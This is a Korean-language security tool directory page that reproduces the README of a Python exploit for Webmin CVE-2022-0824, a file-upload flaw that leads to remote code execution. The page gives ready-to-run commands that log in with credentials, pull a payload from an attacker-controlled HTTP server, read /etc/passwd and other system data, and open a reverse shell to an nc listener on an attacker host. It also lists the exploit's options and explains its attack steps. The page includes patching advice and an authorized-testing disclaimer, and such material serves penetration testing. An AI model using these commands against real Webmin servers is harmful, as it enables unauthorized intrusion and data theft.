Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Webmin-CVE-2022-0824-Enhanced-Exploit — Webmin CVE-2022-0824에 대한 Python 익스플로잇, 이중 모드 지원: 직접 명령 실행 및 리버스 셸. 여러 페이로드 유형, 지능형 파일 관리, 승인된 보안 테스트를 위한 상세한 디버그 로깅을 특징으로 합니다. | Kitploit
도구/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolShellcode Generation

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Webmin CVE-2022-0824에 대한 Python 익스플로잇, 이중 모드 지원: 직접 명령 실행 및 리버스 셸. 여러 페이로드 유형, 지능형 파일 관리, 승인된 보안 테스트를 위한 상세한 디버그 로깅을 특징으로 합니다.

저장소 보기
1년 전아직 검토되지 않음

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Webmin CVE-2022-0824 향상된 취약점 익스플로잇 도구 - 명령 실행 및 리버스 쉘 이중 모드 지원

Python Version License CVE

[!IMPORTANT]

Webmin CVE-2022-0824 취약점을 위한 향상된 익스플로잇 도구로, 직접 명령 실행과 리버스 쉘 두 가지 모드를 지원합니다.

🚀 특징

  • ✅ 이중 모드 지원: 명령 실행 모드 + 리버스 쉘 모드
  • ✅ 다양한 페이로드: Perl, Bash, Python 세 가지 페이로드
  • ✅ 스마트 파일 관리: 고유 파일명 자동 생성으로 파일 충돌 방지
  • ✅ 강제 덮어쓰기 업로드: 기존 파일 자동 덮어쓰기 처리
  • ✅ 다중 업로드 방식: HTTP 다운로드, 직접 업로드, 명령 실행 생성
  • ✅ 상세 디버그 정보: 전체 실행 과정 로그
  • ✅ 사용자 친화적 인터페이스: 컬러 출력 및 명확한 상태 표시

📋 취약점 정보

  • CVE 번호: CVE-2022-0824
  • 영향 버전: Webmin < 1.990
  • 취약점 유형: 임의 파일 업로드로 인한 원격 코드 실행
  • CVSS 점수: 9.8 (Critical)

🛠️ 설치 요구사항

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 사용 방법

명령 실행 모드 (권장)

root@kitploit:~
# 기본 명령 실행
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# 시스템 정보 확인
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# 파일 목록 출력
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# 민감 파일 확인
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# 네트워크 정보
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

리버스 쉘 모드

root@kitploit:~
# 1. 리스너 시작
nc -nlvp 9999

# 2. 익스플로잇 실행
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 매개변수 설명

*참고: 리버스 쉘 모드에서 필수

🎯 사용 예제

예제 1: 시스템 정보 수집

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

예제 2: 파일 시스템 탐색

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

예제 3: 네트워크 설정 확인

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 작동 원리

  1. 로그인 인증: 제공된 자격 증명으로 Webmin 관리 인터페이스에 로그인
  2. 페이로드 생성: 모드에 따라 해당 CGI 스크립트 생성
  3. 파일 업로드: 파일 관리자의 HTTP 다운로드 기능을 통해 페이로드 업로드
  4. 권한 설정: 업로드된 파일에 실행 권한 부여
  5. 명령 실행: 업로드된 CGI 스크립트에 접근하여 명령 실행 또는 리버스 연결 설정

🛡️ 보호 권장 사항

  • Webmin을 최신 버전(>= 1.990)으로 즉시 업데이트
  • Webmin 관리 인터페이스의 네트워크 접근 제한
  • 강력한 비밀번호와 이중 인증 사용
  • 시스템 로그 정기적 감사
  • 웹 애플리케이션 방화벽(WAF) 배포

⚠️ 면책 조항

본 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다.

  • 🚫 승인되지 않은 시스템에 사용 금지
  • 🚫 악의적인 공격에 사용 금지
  • 🚫 사용자는 관련 법적 책임을 부담해야 함
  • ✅ 명시적 승인을 받은 환경에서만 사용
  • ✅ 보안 연구 및 취약점 검증에 사용

📚 기술 세부 사항

페이로드 유형

  • Perl CGI: 주요 페이로드, 호환성 최고
  • Bash CGI: 대체 페이로드, Linux 시스템에 적합
  • Python CGI: 대체 페이로드, 기능이 가장 풍부

업로드 방식

  1. HTTP 다운로드: Webmin 파일 관리자의 원격 다운로드 기능 사용
  2. 직접 업로드: 파일 업로드 인터페이스를 통해
  3. 명령 생성: 시스템 명령을 통해 파일 생성

파일 이름 지정 전략

  • 명령 내용 기반 MD5 해시
  • 타임스탬프 접미사
  • 실행마다 다른 파일명 보장

🔄 업데이트 로그

v5.0 (2025-08-05)

  • ✨ 명령 실행 모드 추가
  • 🐛 파일 덮어쓰기 문제 수정
  • 🔧 파일 이름 지정 전략 개선
  • 📈 오류 처리 강화

v4.0 (원본 기반)

  • 🎯 faisalfs10x의 원본 코드 기반
  • 🔧 CGI 호환성 개선
  • 📝 상세 로그 추가

🤝 기여

Issue 및 Pull Request를 환영합니다!

  1. 이 저장소를 Fork
  2. 기능 브랜치 생성 (git checkout -b feature/AmazingFeature)
  3. 변경 사항 커밋 (git commit -m 'Add some AmazingFeature')
  4. 브랜치에 푸시 (git push origin feature/AmazingFeature)
  5. Pull Request 열기

📄 라이선스

이 프로젝트는 MIT 라이선스를 따릅니다. 자세한 내용은 LICENSE 파일을 참조하세요.

🙏 감사의 말

  • 원본 코드 작성자: @faisalfs10x
  • 원본 프로젝트: Webmin-CVE-2022-0824-revshell
  • CVE 발견자: 해당 보안 연구자들

📞 연락처

문의나 제안 사항이 있으면 다음 방법으로 연락해 주세요:

  • 📧 GitHub Issue 제출
  • 🐛 보안 문제는 쪽지로 보고

⭐ 이 프로젝트가 도움이 되었다면 Star를 눌러 주세요!

🔗 관련 링크

  • CVE-2022-0824 상세 정보
  • Webmin 공식 웹사이트
  • 원본 프로젝트

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
도구 다운로드
매개변수설명필수예시
-t, --target대상 Webmin URL✅http://192.168.1.100:10000/
-c, --credential로그인 자격 증명✅admin:password
-LS, --py3http_serverHTTP 서버 주소✅192.168.1.50:8080
--shell실행할 명령❌"ls -la"
-L, --callback_ip리버스 쉘 콜백 IP❌*192.168.1.50
-P, --callback_port리버스 쉘 콜백 포트❌*9999